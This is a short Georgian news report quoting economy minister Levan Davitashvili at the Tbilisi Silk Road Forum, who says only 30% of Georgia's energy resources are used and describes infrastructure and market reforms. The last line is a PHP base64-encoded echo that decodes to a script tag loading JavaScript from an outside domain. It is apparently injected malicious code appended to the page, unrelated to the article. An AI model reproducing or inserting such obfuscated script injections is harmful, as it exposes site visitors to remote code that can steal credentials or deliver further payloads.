celsiusi
ავერსი შნაიდერი

საქართველოს ეკონომიკისა და მდგრადი განვითარების მინისტრის განცხადებით, საქართველოში ენერგორესურსების მხოლოდ 30%-ია ათვისებული. ამის შესახებ ლევან დავითაშვილმა “თბილისის აბრეშუმის გზის ფორუმზე” სიტყვით გამოსვლისას განაცხადა.

“მზარდი მოთხოვნა ენერგიაზე, როგორც ქვეყანაში, ისე რეგიონში და საერთაშორისოდ, ხაზს უსვამს პოტენციალს, რომელიც საქართველოში ჯერ კიდევ არ არის ბოლომდე ათვისებული ენერგორესურსების სახით. ჩვენ ვფიქრობთ, რომ საქართველოს პოტენციალის მხოლოდ 30%-ია ათვისებული.

მიმდინარეობს სტრატეგიული პროექტები, რათა მოხდეს ჩვენი სატრანსპორტო და ენერგეტიკული ინფრასტრუქტურის მოდერნიზება. ვატარებთ რეფორმებს, როგორიცაა ენერგეტიკული ბაზრის ლიბერალიზაცია ჩვენი ენერგოუსაფრთხოების გასაძლიერებლად”, - აცხადებს ლევან დავითაშვილი.

212
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");